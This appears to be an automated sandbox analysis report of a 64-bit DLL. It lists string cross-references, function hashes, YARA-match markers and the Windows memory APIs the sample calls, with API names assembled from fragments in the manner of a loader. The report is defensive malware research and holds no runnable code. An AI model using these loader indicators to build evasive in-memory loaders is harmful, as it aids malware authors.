/, xrefs: 00007FFA0AE75B3F
r, xrefs: 00007FFA0AE78547
D, xrefs: 00007FFA0AE7509F
-, xrefs: 00007FFA0AE788EF
i, xrefs: 00007FFA0AE76F3F
2, xrefs: 00007FFA0AE74107
G, xrefs: 00007FFA0AE755BF
q, xrefs: 00007FFA0AE75DCF
Q, xrefs: 00007FFA0AE756A7
K, xrefs: 00007FFA0AE76607
T, xrefs: 00007FFA0AE74637
D, xrefs: 00007FFA0AE78077
n, xrefs: 00007FFA0AE7587F
O, xrefs: 00007FFA0AE77C4F
_, xrefs: 00007FFA0AE7718F
M, xrefs: 00007FFA0AE75277
@, xrefs: 00007FFA0AE7437F
0, xrefs: 00007FFA0AE742BF
@, xrefs: 00007FFA0AE774BF
n, xrefs: 00007FFA0AE75977
d, xrefs: 00007FFA0AE740E7
%, xrefs: 00007FFA0AE77ECF
K, xrefs: 00007FFA0AE7628F
w, xrefs: 00007FFA0AE7703F
v, xrefs: 00007FFA0AE766DF
z, xrefs: 00007FFA0AE77EB7
9, xrefs: 00007FFA0AE78B4F
{, xrefs: 00007FFA0AE787DF
!, xrefs: 00007FFA0AE779AF
, xrefs: 00007FFA0AE75C47
D, xrefs: 00007FFA0AE784DF
8, xrefs: 00007FFA0AE75DA7
*, xrefs: 00007FFA0AE755CF
V, xrefs: 00007FFA0AE759BF
`, xrefs: 00007FFA0AE77D17
e, xrefs: 00007FFA0AE7566F
3, xrefs: 00007FFA0AE7580F
[, xrefs: 00007FFA0AE7834F
}, xrefs: 00007FFA0AE74C67
:, xrefs: 00007FFA0AE7482F
:, xrefs: 00007FFA0AE7428F
F, xrefs: 00007FFA0AE7907F
W, xrefs: 00007FFA0AE75C9F
d, xrefs: 00007FFA0AE76C1F
N, xrefs: 00007FFA0AE75567
$, xrefs: 00007FFA0AE790EF
I, xrefs: 00007FFA0AE745F7
o, xrefs: 00007FFA0AE770D7
5, xrefs: 00007FFA0AE75F57
+, xrefs: 00007FFA0AE7774F
M, xrefs: 00007FFA0AE7586F
u, xrefs: 00007FFA0AE78EDF
X, xrefs: 00007FFA0AE75AEF
C, xrefs: 00007FFA0AE74537
?, xrefs: 00007FFA0AE78217
!, xrefs: 00007FFA0AE76387
c, xrefs: 00007FFA0AE76077
Z, xrefs: 00007FFA0AE742EF
a, xrefs: 00007FFA0AE7732F
i, xrefs: 00007FFA0AE74ECF
?, xrefs: 00007FFA0AE76AE7
*, xrefs: 00007FFA0AE769D7
@, xrefs: 00007FFA0AE743D7
!, xrefs: 00007FFA0AE761B7
m, xrefs: 00007FFA0AE77D37
4, xrefs: 00007FFA0AE7686F
(, xrefs: 00007FFA0AE75E5F
I, xrefs: 00007FFA0AE7626F
d, xrefs: 00007FFA0AE753A7
`, xrefs: 00007FFA0AE78B47
Q, xrefs: 00007FFA0AE78CFF
B, xrefs: 00007FFA0AE780BF
., xrefs: 00007FFA0AE74E77
^, xrefs: 00007FFA0AE74FB7
(, xrefs: 00007FFA0AE7408F
(, xrefs: 00007FFA0AE760E7
R, xrefs: 00007FFA0AE77637
?, xrefs: 00007FFA0AE7867F
y, xrefs: 00007FFA0AE7725F
5, xrefs: 00007FFA0AE76DDF
}, xrefs: 00007FFA0AE755AF
\, xrefs: 00007FFA0AE74E2F
e, xrefs: 00007FFA0AE79047
s, xrefs: 00007FFA0AE747CF
h, xrefs: 00007FFA0AE76697
K, xrefs: 00007FFA0AE780DF
b, xrefs: 00007FFA0AE7407F
V, xrefs: 00007FFA0AE76137
], xrefs: 00007FFA0AE745C7
\, xrefs: 00007FFA0AE7571F
J, xrefs: 00007FFA0AE749CF
&, xrefs: 00007FFA0AE74C6F
Y, xrefs: 00007FFA0AE77F2F
w, xrefs: 00007FFA0AE76F4F
g, xrefs: 00007FFA0AE743A7
T, xrefs: 00007FFA0AE7507F
., xrefs: 00007FFA0AE7918F
I, xrefs: 00007FFA0AE76727
`, xrefs: 00007FFA0AE7680F
W, xrefs: 00007FFA0AE74747
g, xrefs: 00007FFA0AE75377
n, xrefs: 00007FFA0AE763FF
%, xrefs: 00007FFA0AE7715F
w, xrefs: 00007FFA0AE7691F
5, xrefs: 00007FFA0AE787A7
J, xrefs: 00007FFA0AE7454F
Y, xrefs: 00007FFA0AE7850F
2, xrefs: 00007FFA0AE7823F
z, xrefs: 00007FFA0AE76F37
g, xrefs: 00007FFA0AE746EF
*, xrefs: 00007FFA0AE76EA7
L, xrefs: 00007FFA0AE7522F
., xrefs: 00007FFA0AE75E9F
(, xrefs: 00007FFA0AE7708F
+, xrefs: 00007FFA0AE74D97
F, xrefs: 00007FFA0AE7483F
g, xrefs: 00007FFA0AE782CF
/, xrefs: 00007FFA0AE77E87
&, xrefs: 00007FFA0AE78A2F
%, xrefs: 00007FFA0AE76F27
\, xrefs: 00007FFA0AE78797
,, xrefs: 00007FFA0AE78F57
=, xrefs: 00007FFA0AE7536F
E, xrefs: 00007FFA0AE7898F
t, xrefs: 00007FFA0AE75967
4, xrefs: 00007FFA0AE766F7
-, xrefs: 00007FFA0AE77CC7
p, xrefs: 00007FFA0AE779DF
V, xrefs: 00007FFA0AE7409F
&, xrefs: 00007FFA0AE757A7
+, xrefs: 00007FFA0AE760DF
H, xrefs: 00007FFA0AE75E87
<, xrefs: 00007FFA0AE75C7F
~, xrefs: 00007FFA0AE761FF
z, xrefs: 00007FFA0AE75887
<, xrefs: 00007FFA0AE741CF
u, xrefs: 00007FFA0AE76677
m, xrefs: 00007FFA0AE78EBF
6, xrefs: 00007FFA0AE76237
g, xrefs: 00007FFA0AE7504F
?, xrefs: 00007FFA0AE777CF
x, xrefs: 00007FFA0AE767BF
), xrefs: 00007FFA0AE7575F
X, xrefs: 00007FFA0AE77377
c, xrefs: 00007FFA0AE79117
?, xrefs: 00007FFA0AE75037
;, xrefs: 00007FFA0AE76997
s, xrefs: 00007FFA0AE76E0F
h, xrefs: 00007FFA0AE78AD7
m, xrefs: 00007FFA0AE76ADF
4, xrefs: 00007FFA0AE75AC7
;, xrefs: 00007FFA0AE77007
s, xrefs: 00007FFA0AE7687F
h, xrefs: 00007FFA0AE759A7
r, xrefs: 00007FFA0AE769FF
t, xrefs: 00007FFA0AE74E67
P, xrefs: 00007FFA0AE7516F
r, xrefs: 00007FFA0AE753DF
T, xrefs: 00007FFA0AE747EF
X, xrefs: 00007FFA0AE74427
R, xrefs: 00007FFA0AE756CF
u, xrefs: 00007FFA0AE745FF
^, xrefs: 00007FFA0AE76D9F
1, xrefs: 00007FFA0AE788F7
M, xrefs: 00007FFA0AE782BF
q, xrefs: 00007FFA0AE7613F
", xrefs: 00007FFA0AE79107
", xrefs: 00007FFA0AE74A07
s, xrefs: 00007FFA0AE746C7
K, xrefs: 00007FFA0AE78267
!, xrefs: 00007FFA0AE7561F
^, xrefs: 00007FFA0AE790BF
m, xrefs: 00007FFA0AE75A8F
C, xrefs: 00007FFA0AE7562F
o, xrefs: 00007FFA0AE7692F
d, xrefs: 00007FFA0AE75C77
%, xrefs: 00007FFA0AE75B8F
i, xrefs: 00007FFA0AE7416F
p, xrefs: 00007FFA0AE779B7
#, xrefs: 00007FFA0AE747FF
t, xrefs: 00007FFA0AE7719F
<, xrefs: 00007FFA0AE7460F
k, xrefs: 00007FFA0AE77A57
t, xrefs: 00007FFA0AE74417
), xrefs: 00007FFA0AE76E07
P, xrefs: 00007FFA0AE76197
\, xrefs: 00007FFA0AE74AB7
#, xrefs: 00007FFA0AE750DF
&, xrefs: 00007FFA0AE77197
5, xrefs: 00007FFA0AE77067
#, xrefs: 00007FFA0AE746AF
}, xrefs: 00007FFA0AE75D47
h, xrefs: 00007FFA0AE7839F
P, xrefs: 00007FFA0AE7527F
9, xrefs: 00007FFA0AE74FD7
G, xrefs: 00007FFA0AE78BBF
a, xrefs: 00007FFA0AE774CF
(, xrefs: 00007FFA0AE77DC7
b, xrefs: 00007FFA0AE75437
), xrefs: 00007FFA0AE770DF
M, xrefs: 00007FFA0AE755D7
$, xrefs: 00007FFA0AE75507
2, xrefs: 00007FFA0AE7653F
=, xrefs: 00007FFA0AE757E7
v, xrefs: 00007FFA0AE77A1F
j, xrefs: 00007FFA0AE7780F
@, xrefs: 00007FFA0AE78BAF
J, xrefs: 00007FFA0AE74DE7
g, xrefs: 00007FFA0AE763DF
#, xrefs: 00007FFA0AE78BF7
\, xrefs: 00007FFA0AE75777
p, xrefs: 00007FFA0AE7565F
U, xrefs: 00007FFA0AE777FF
Z, xrefs: 00007FFA0AE767D7
P, xrefs: 00007FFA0AE7556F
+, xrefs: 00007FFA0AE74C8F
&, xrefs: 00007FFA0AE7660F
J, xrefs: 00007FFA0AE7448F
\, xrefs: 00007FFA0AE78567
&, xrefs: 00007FFA0AE7827F
`, xrefs: 00007FFA0AE77547
p, xrefs: 00007FFA0AE770CF
n, xrefs: 00007FFA0AE74B47
N, xrefs: 00007FFA0AE77707
s, xrefs: 00007FFA0AE7621F
*, xrefs: 00007FFA0AE7643F
8, xrefs: 00007FFA0AE78937
v, xrefs: 00007FFA0AE77C87
d, xrefs: 00007FFA0AE779FF
`, xrefs: 00007FFA0AE752EF
i, xrefs: 00007FFA0AE78AEF
L, xrefs: 00007FFA0AE741DF
', xrefs: 00007FFA0AE748A7
G, xrefs: 00007FFA0AE78C17
}, xrefs: 00007FFA0AE7520F
l, xrefs: 00007FFA0AE7716F
[, xrefs: 00007FFA0AE7914F
|, xrefs: 00007FFA0AE78CE7
s, xrefs: 00007FFA0AE76687
l, xrefs: 00007FFA0AE7651F
n, xrefs: 00007FFA0AE778CF
), xrefs: 00007FFA0AE7908F
%, xrefs: 00007FFA0AE76427
J, xrefs: 00007FFA0AE75417
b, xrefs: 00007FFA0AE777E7
_, xrefs: 00007FFA0AE781B7
3, xrefs: 00007FFA0AE74117
?, xrefs: 00007FFA0AE76C0F
q, xrefs: 00007FFA0AE78D37
N, xrefs: 00007FFA0AE75A37
_, xrefs: 00007FFA0AE768BF
], xrefs: 00007FFA0AE751B7
', xrefs: 00007FFA0AE787BF
#, xrefs: 00007FFA0AE745D7
0, xrefs: 00007FFA0AE741A7
T, xrefs: 00007FFA0AE760B7
%, xrefs: 00007FFA0AE749A7
5, xrefs: 00007FFA0AE760BF
e, xrefs: 00007FFA0AE75987
1, xrefs: 00007FFA0AE78FA7
m, xrefs: 00007FFA0AE75907
f, xrefs: 00007FFA0AE754CF
,, xrefs: 00007FFA0AE761DF
t, xrefs: 00007FFA0AE7574F
#, xrefs: 00007FFA0AE78297
&, xrefs: 00007FFA0AE76A77
*, xrefs: 00007FFA0AE74DB7
,, xrefs: 00007FFA0AE78F67
d, xrefs: 00007FFA0AE774B7
W, xrefs: 00007FFA0AE76B97
C, xrefs: 00007FFA0AE758E7
5, xrefs: 00007FFA0AE78987
i, xrefs: 00007FFA0AE74E9F
q, xrefs: 00007FFA0AE7603F
*, xrefs: 00007FFA0AE7773F
m, xrefs: 00007FFA0AE77F3F
/, xrefs: 00007FFA0AE76FBF
n, xrefs: 00007FFA0AE78CDF
y, xrefs: 00007FFA0AE76187
t, xrefs: 00007FFA0AE752FF
%, xrefs: 00007FFA0AE76947

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID:
String ID: $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$E$E$E$E$E$E$E$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
API String ID: 0-872547024
Opcode ID: 309fbce5bc38606eae12f3d5386e9f88735424bc87dc6888b7f8bff99382bbf5
Instruction ID: 7ba47381b56d5c863a8ecdf47f3a2d60e43c1ca8669da6d166ad3f0af0ec6a0d
Opcode Fuzzy Hash: 309fbce5bc38606eae12f3d5386e9f88735424bc87dc6888b7f8bff99382bbf5
Instruction Fuzzy Hash: D0A34E1250DBC1C9E332C23CB45878FAE9193A3319F484299D3E41AADBC7AE8155DF67

Uniqueness

Uniqueness Score: -1.00%

Function 0000020509D60000 Relevance: 53.5, APIs: 4, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 0000020509D60344
VirtualAlloc.KERNELBASE ref: 0000020509D6038A
VirtualProtect.KERNELBASE ref: 0000020509D6085C
RtlAvlRemoveNode.NTDLL ref: 0000020509D608E9

Strings

rote, xrefs: 0000020509D600D5
Slee, xrefs: 0000020509D60084
onTa, xrefs: 0000020509D60148
hIns, xrefs: 0000020509D600EB
Virt, xrefs: 0000020509D600C5
ct, xrefs: 0000020509D600DD
ualP, xrefs: 0000020509D600CD
ddFu, xrefs: 0000020509D6013A
Flus, xrefs: 0000020509D600E4
temI, xrefs: 0000020509D6011F
o, xrefs: 0000020509D6012E
RtlA, xrefs: 0000020509D60133
Libr, xrefs: 0000020509D6009D
lloc, xrefs: 0000020509D600BD
Cach, xrefs: 0000020509D60100
nf, xrefs: 0000020509D60127
ualA, xrefs: 0000020509D600B5
eSys, xrefs: 0000020509D60117
ncti, xrefs: 0000020509D60141
ativ, xrefs: 0000020509D6010F
GetN, xrefs: 0000020509D60107
aryA, xrefs: 0000020509D600A5
Load, xrefs: 0000020509D60095
truc, xrefs: 0000020509D600F2
Virt, xrefs: 0000020509D600AD
tion, xrefs: 0000020509D600F9

Memory Dump Source

Source File: 00000000.00000002.317599853.0000020509D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020509D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20509d60000_loaddll64.jbxd

Similarity

API ID: Virtual$AllocInfoNativeNodeProtectRemoveSystem
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 1419936716-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: 5789fdb1eab680ed03f5b3dba42d7b344e83303d956e8324fa4ad8f653f5a6fb
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: 0362F331658F588BD719DF19C8897BEB7E1FB68300F14462DE88AC7256DB34E442CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004DDC Relevance: 7.8, Strings: 6, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

u, xrefs: 0000000180004DEF
+, xrefs: 000000018000530C
3C, xrefs: 0000000180005284
@_, xrefs: 0000000180004EFC
Q+, xrefs: 000000018000533C
w, xrefs: 00000001800050FF

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: @_$Q+$w$+$3C$u
API String ID: 0-4152583413
Opcode ID: 9f8a14a22d69b5951a2631c0067e0fc4d36d0f639cba0d102428ca4f006b14de
Instruction ID: b6ea412dc30f19c74fb4b1663690e8dc750e0b49b1240d0c045de5a6b9424b82
Opcode Fuzzy Hash: 9f8a14a22d69b5951a2631c0067e0fc4d36d0f639cba0d102428ca4f006b14de
Instruction Fuzzy Hash: 7D02F67151038DEFDB98DF24C889ADD3BA1FB58398F952219FC0A972A0C774D985CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180028C94 Relevance: 6.5, Strings: 5, Instructions: 249
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

SW, xrefs: 0000000180028CD3
3m, xrefs: 0000000180029083
rS, xrefs: 0000000180028F00
t.?8, xrefs: 0000000180029073
r, xrefs: 0000000180028EC9

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 3m$SW$rS$r$t.?8
API String ID: 0-4220278859
Opcode ID: 85a6ee6c84f7a60e958ee75f08787c2d87ed4ffb25c6bd77534bac28b26f7971
Instruction ID: 5729ab1ff226baa14ab4ffc9551888db56205bfd96deea9119b6bbc9091883bb
Opcode Fuzzy Hash: 85a6ee6c84f7a60e958ee75f08787c2d87ed4ffb25c6bd77534bac28b26f7971
Instruction Fuzzy Hash: F2C1EF7151A784ABD388DF28C5CA95BBBE1FBC4744F906A1DF496862A0D7B4D908CF02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005DB4 Relevance: 6.4, Strings: 5, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>, xrefs: 0000000180005E08
cG, xrefs: 0000000180006018
Qz, xrefs: 0000000180005E61
iP., xrefs: 0000000180005FF3
9, xrefs: 0000000180005E00

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 9$>$Qz$cG$iP.
API String ID: 0-2314038544
Opcode ID: 4158940623df5b63cf90af9ecb6c971ef7c92bce548850bfcd4728ba9d0de4d2
Instruction ID: 2738067ee2515d3e4966bb770307c21824dc71e1dd538b0d2de93925eb972619
Opcode Fuzzy Hash: 4158940623df5b63cf90af9ecb6c971ef7c92bce548850bfcd4728ba9d0de4d2
Instruction Fuzzy Hash: 57815D701497888BEBE8DF24C8C5BDA7BE1FB88344F50551DF88A8B290CB75DA44CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800248E0 Relevance: 5.9, Strings: 4, Instructions: 869
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

kr, xrefs: 0000000180024E1A
Rl, xrefs: 0000000180024C1F
X, xrefs: 0000000180024D35
V%?, xrefs: 0000000180024E1D

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Rl$X$kr$V%?
API String ID: 0-1881522904
Opcode ID: 98ff1e27a160c74632e307d872ef1a7f9803bcbde420e3daba4ce0dca79685d9
Instruction ID: 70c5aac2912e64376728126259cd49d2f789cf9a10fb17a3f2cb6be72cb14558
Opcode Fuzzy Hash: 98ff1e27a160c74632e307d872ef1a7f9803bcbde420e3daba4ce0dca79685d9
Instruction Fuzzy Hash: 59A2077051078D8FDB89CF24C88A5DE3BA0FB58398F52531DFC8AA6290D778D595CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800038A5 Relevance: 5.2, Strings: 4, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

l@-T, xrefs: 0000000180003AC8
pN, xrefs: 0000000180003B71
+s, xrefs: 0000000180003B8E
x+MS, xrefs: 00000001800039C2

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: +s$l@-T$pN$x+MS
API String ID: 0-3074933293
Opcode ID: 81be9b45353ead76c9a7b6c7e167c5c32a8ae5faee5dc8465e9a6d9c4c43a028
Instruction ID: e901c82c2c3415e94c79d9569d7d5064836046090d2f5b38374df02bf067750a
Opcode Fuzzy Hash: 81be9b45353ead76c9a7b6c7e167c5c32a8ae5faee5dc8465e9a6d9c4c43a028
Instruction Fuzzy Hash: A991597160074D8BEB59CF28C89A6DE3BA1FB58398F51422CFC4A97290CB78D655CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000B1E0 Relevance: 4.1, Strings: 3, Instructions: 302COMMON

Download Yara Rule

Strings

m)7, xrefs: 000000018000B456
\, xrefs: 000000018000B6EF
m[+, xrefs: 000000018000B7C8

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: \$m[+$m)7
API String ID: 0-1435720626
Opcode ID: af10a5be19bd77cf0563b38453e590c7ca23ba3a925fd2c55e2086c6d71307a8
Instruction ID: 883ce2ee539239a1f536d03f946b290b5c9bffedac0f26b385fd5492cb17272a
Opcode Fuzzy Hash: af10a5be19bd77cf0563b38453e590c7ca23ba3a925fd2c55e2086c6d71307a8
Instruction Fuzzy Hash: C002F6715083C88BEBFADF64C8897DE7BACFB54708F104619EA0A9E298DB745744CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800038DC Relevance: 2.6, Strings: 2, Instructions: 90COMMON

Download Yara Rule

Strings

8, xrefs: 0000000180003A1F
x+MS, xrefs: 00000001800039C2

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: x+MS$8
API String ID: 0-2879286383
Opcode ID: 0b36e420fc5be994054ff9bd7cd914dceaa5a559053905e74aaceefae8f335f5
Instruction ID: 069f65542df350c22b25c5b11342d601f1728201a4aced1865a094658918a1cd
Opcode Fuzzy Hash: 0b36e420fc5be994054ff9bd7cd914dceaa5a559053905e74aaceefae8f335f5
Instruction Fuzzy Hash: 42413B7050074D8BEB49CF28C88A6DE3FA1FB18398F61421DFD4A96290D778D598CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009E38 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

{6, xrefs: 000000018000A051

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: {6
API String ID: 0-1346941803
Opcode ID: 8506dbb6b1252c503813ed30af6b5c4e6b9b4570125e6fd192f6fa1e5665ff7b
Instruction ID: 4f9844d0cd30e9af067f9ce6bd73810c55f6bc83b648b6efbf776691940ba2a0
Opcode Fuzzy Hash: 8506dbb6b1252c503813ed30af6b5c4e6b9b4570125e6fd192f6fa1e5665ff7b
Instruction Fuzzy Hash: FA8126B09047098BDF48DFA8C4865EEBBF0FB48358F15821DE80AB7291D7789945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180020454 Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

1, xrefs: 000000018002050B

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 1
API String ID: 0-4267224553
Opcode ID: 14ae2c29f1f0adff71999c81ec21c279a8b8cf5828faf7ab2494e8710ca5a4c5
Instruction ID: f864b420d3f879fa0c4a6b1c1884d968131e299f1c3c71a38cb5ded6753929e5
Opcode Fuzzy Hash: 14ae2c29f1f0adff71999c81ec21c279a8b8cf5828faf7ab2494e8710ca5a4c5
Instruction Fuzzy Hash: 4881FE705087848FD779DF28C59A6DEBBF1FB89704F004A1DEA8A8B260D7769905CB42

Uniqueness

Uniqueness Score: -1.00%

